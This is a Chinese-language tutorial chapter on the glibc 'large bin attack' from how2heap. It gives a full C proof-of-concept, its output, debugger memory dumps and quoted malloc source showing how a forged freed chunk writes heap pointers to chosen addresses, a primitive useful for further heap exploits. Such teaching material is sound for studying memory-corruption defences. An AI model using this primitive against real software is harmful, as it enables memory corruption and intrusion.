3.1.9 Linux 堆利用(四)

下载文件

how2heap

large_bin_attack

  1. #include<stdio.h>
  2. #include<stdlib.h>
  3. int main() {
  4. unsigned long stack_var1 = 0;
  5. unsigned long stack_var2 = 0;
  6. fprintf(stderr, "The targets we want to rewrite on stack:\n");
  7. fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
  8. fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
  9. unsigned long *p1 = malloc(0x100);
  10. fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
  11. malloc(0x10);
  12. unsigned long *p2 = malloc(0x400);
  13. fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
  14. malloc(0x10);
  15. unsigned long *p3 = malloc(0x400);
  16. fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
  17. malloc(0x10);
  18. // deal with tcache - libc-2.26
  19. // int *a[10], *b[10], i;
  20. // for (i = 0; i < 7; i++) {
  21. // a[i] = malloc(0x100);
  22. // b[i] = malloc(0x400);
  23. // }
  24. // for (i = 0; i < 7; i++) {
  25. // free(a[i]);
  26. // free(b[i]);
  27. // }
  28. free(p1);
  29. free(p2);
  30. fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");
  31. malloc(0x30);
  32. fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");
  33. p2[-1] = 0x3f1;
  34. p2[0] = 0;
  35. p2[2] = 0;
  36. p2[1] = (unsigned long)(&stack_var1 - 2);
  37. p2[3] = (unsigned long)(&stack_var2 - 4);
  38. fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");
  39. free(p3);
  40. malloc(0x30);
  41. fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
  42. fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
  43. fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
  44. }
  1. $ gcc -g large_bin_attack.c
  2. $ ./a.out
  3. The targets we want to rewrite on stack:
  4. stack_var1 (0x7fffffffdeb0): 0
  5. stack_var2 (0x7fffffffdeb8): 0
  6. Now, we allocate the first chunk: 0x555555757000
  7. Then, we allocate the second chunk(large chunk): 0x555555757130
  8. Finally, we allocate the third chunk(large chunk): 0x555555757560
  9. Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
  10. Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist
  11. Now we use a vulnerability to overwrite the freed second chunk
  12. Finally, we free the third chunk and malloc again, targets should have already been rewritten:
  13. stack_var1 (0x7fffffffdeb0): 0x555555757560
  14. stack_var2 (0x7fffffffdeb8): 0x555555757560

该技术可用于修改任意地址的值,例如栈上的变量 stack_var1 和 stack_var2。在实践中常常作为其他漏洞利用的前奏,例如在 fastbin attack 中用于修改全局变量 global_max_fast 为一个很大的值。

首先我们分配 chunk p1, p2 和 p3,并且在它们之间插入其他的 chunk 以防止在释放时被合并。此时的内存布局如下:

  1. gef x/2gx &stack_var1
  2. 0x7fffffffde70: 0x0000000000000000 0x0000000000000000
  3. gef x/4gx p1-2
  4. 0x555555757000: 0x0000000000000000 0x0000000000000111 <-- p1
  5. 0x555555757010: 0x0000000000000000 0x0000000000000000
  6. gef x/8gx p2-6
  7. 0x555555757110: 0x0000000000000000 0x0000000000000021
  8. 0x555555757120: 0x0000000000000000 0x0000000000000000
  9. 0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2
  10. 0x555555757140: 0x0000000000000000 0x0000000000000000
  11. gef x/8gx p3-6
  12. 0x555555757540: 0x0000000000000000 0x0000000000000021
  13. 0x555555757550: 0x0000000000000000 0x0000000000000000
  14. 0x555555757560: 0x0000000000000000 0x0000000000000411 <-- p3
  15. 0x555555757570: 0x0000000000000000 0x0000000000000000
  16. gef x/8gx p3+(0x410/8)-2
  17. 0x555555757970: 0x0000000000000000 0x0000000000000021
  18. 0x555555757980: 0x0000000000000000 0x0000000000000000
  19. 0x555555757990: 0x0000000000000000 0x0000000000020671 <-- top
  20. 0x5555557579a0: 0x0000000000000000 0x0000000000000000

然后依次释放掉 p1 和 p2,这两个 free chunk 将被放入 unsorted bin:

  1. gef x/8gx p1-2
  2. 0x555555757000: 0x0000000000000000 0x0000000000000111 <-- p1 [be freed]
  3. 0x555555757010: 0x00007ffff7dd3b78 0x0000555555757130
  4. 0x555555757020: 0x0000000000000000 0x0000000000000000
  5. 0x555555757030: 0x0000000000000000 0x0000000000000000
  6. gef x/8gx p2-2
  7. 0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2 [be freed]
  8. 0x555555757140: 0x0000555555757000 0x00007ffff7dd3b78
  9. 0x555555757150: 0x0000000000000000 0x0000000000000000
  10. 0x555555757160: 0x0000000000000000 0x0000000000000000
  11. gef heap bins unsorted
  12. [ Unsorted Bin for arena 'main_arena' ]
  13. [+] unsorted_bins[0]: fw=0x555555757130, bk=0x555555757000
  14. Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE) Chunk(addr=0x555555757010, size=0x110, flags=PREV_INUSE)
  15. [+] Found 2 chunks in unsorted bin.

接下来随便 malloc 一个 chunk,则 p1 被切分为两块,一块作为分配的 chunk 返回,剩下的一块继续留在 unsorted bin(p1 的作用就在这里,如果没有 p1,那么切分的将是 p2)。而 p2 则被整理回对应的 large bin 链表中:

  1. gef x/14gx p1-2
  2. 0x555555757000: 0x0000000000000000 0x0000000000000041 <-- p1-1
  3. 0x555555757010: 0x00007ffff7dd3c78 0x00007ffff7dd3c78
  4. 0x555555757020: 0x0000000000000000 0x0000000000000000
  5. 0x555555757030: 0x0000000000000000 0x0000000000000000
  6. 0x555555757040: 0x0000000000000000 0x00000000000000d1 <-- p1-2 [be freed]
  7. 0x555555757050: 0x00007ffff7dd3b78 0x00007ffff7dd3b78 <-- fd, bk
  8. 0x555555757060: 0x0000000000000000 0x0000000000000000
  9. gef x/8gx p2-2
  10. 0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2 [be freed]
  11. 0x555555757140: 0x00007ffff7dd3f68 0x00007ffff7dd3f68 <-- fd, bk
  12. 0x555555757150: 0x0000555555757130 0x0000555555757130 <-- fd_nextsize, bk_nextsize
  13. 0x555555757160: 0x0000000000000000 0x0000000000000000
  14. gef heap bins unsorted
  15. [ Unsorted Bin for arena 'main_arena' ]
  16. [+] unsorted_bins[0]: fw=0x555555757040, bk=0x555555757040
  17. Chunk(addr=0x555555757050, size=0xd0, flags=PREV_INUSE)
  18. [+] Found 1 chunks in unsorted bin.
  19. gef heap bins large
  20. [ Large Bins for arena 'main_arena' ]
  21. [+] large_bins[63]: fw=0x555555757130, bk=0x555555757130
  22. Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)
  23. [+] Found 1 chunks in 1 large non-empty bins.

整理的过程如下所示,需要注意的是 large bins 中 chunk 按 fd 指针的顺序从大到小排列,如果大小相同则按照最近使用顺序排列:

  1. /* place chunk in bin */
  2. if (in_smallbin_range (size))
  3. {
  4. [ ... ]
  5. }
  6. else
  7. {
  8. victim_index = largebin_index (size);
  9. bck = bin_at (av, victim_index);
  10. fwd = bck->fd;
  11. /* maintain large bins in sorted order */
  12. if (fwd != bck)
  13. {
  14. /* Or with inuse bit to speed comparisons */
  15. size |= PREV_INUSE;
  16. /* if smaller than smallest, bypass loop below */
  17. assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
  18. if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
  19. {
  20. [ ... ]
  21. }
  22. else
  23. {
  24. assert ((fwd->size & NON_MAIN_ARENA) == 0);
  25. while ((unsigned long) size < fwd->size)
  26. {
  27. [ ... ]
  28. }
  29. if ((unsigned long) size == (unsigned long) fwd->size)
  30. [ ... ]
  31. else
  32. {
  33. victim->fd_nextsize = fwd;
  34. victim->bk_nextsize = fwd->bk_nextsize;
  35. fwd->bk_nextsize = victim;
  36. victim->bk_nextsize->fd_nextsize = victim;
  37. }
  38. bck = fwd->bk;
  39. }
  40. }
  41. else
  42. [ ... ]
  43. }
  44. mark_bin (av, victim_index);
  45. victim->bk = bck;
  46. victim->fd = fwd;
  47. fwd->bk = victim;
  48. bck->fd = victim;

假设我们有一个漏洞,可以对 large bin 里的 chunk p2 进行修改,结合上面的整理过程,我们伪造 p2 如下:

  1. gef x/8gx p2-2
  2. 0x555555757130: 0x0000000000000000 0x00000000000003f1 <-- fake p2 [be freed]
  3. 0x555555757140: 0x0000000000000000 0x00007fffffffde60 <-- bk
  4. 0x555555757150: 0x0000000000000000 0x00007fffffffde58 <-- bk_nextsize
  5. 0x555555757160: 0x0000000000000000 0x0000000000000000

同样的,释放 p3,将其放入 unsorted bin,紧接着进行 malloc 操作,将 p3 整理回 large bin,这个过程中判断条件 (unsigned long) (size) < (unsigned long) (bck->bk->size) 为假,程序将进入 else 分支,其中 fwd 是 fake p2,victim 是 p3,接着 bck 被赋值为 (&stack_var1 - 2)。

在 p3 被放回 large bin 并排序的过程中,我们位于栈上的两个变量也被修改成了 victim,对应的语句分别是 bck->fd = victim;ictim->bk_nextsize->fd_nextsize = victim;

  1. gef x/2gx &stack_var1
  2. 0x7fffffffde70: 0x0000555555757560 0x0000555555757560
  3. gef x/8gx p2-2
  4. 0x555555757130: 0x0000000000000000 0x00000000000003f1
  5. 0x555555757140: 0x0000000000000000 0x0000555555757560
  6. 0x555555757150: 0x0000000000000000 0x0000555555757560
  7. 0x555555757160: 0x0000000000000000 0x0000000000000000
  8. gef x/8gx p3-2
  9. 0x555555757560: 0x0000000000000000 0x0000000000000411
  10. 0x555555757570: 0x0000555555757130 0x00007fffffffde60
  11. 0x555555757580: 0x0000555555757130 0x00007fffffffde58
  12. 0x555555757590: 0x0000000000000000 0x0000000000000000

考虑 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,在 free 之前把两种大小的 tcache bin 都占满。

house_of_rabbit

house_of_roman

参考资料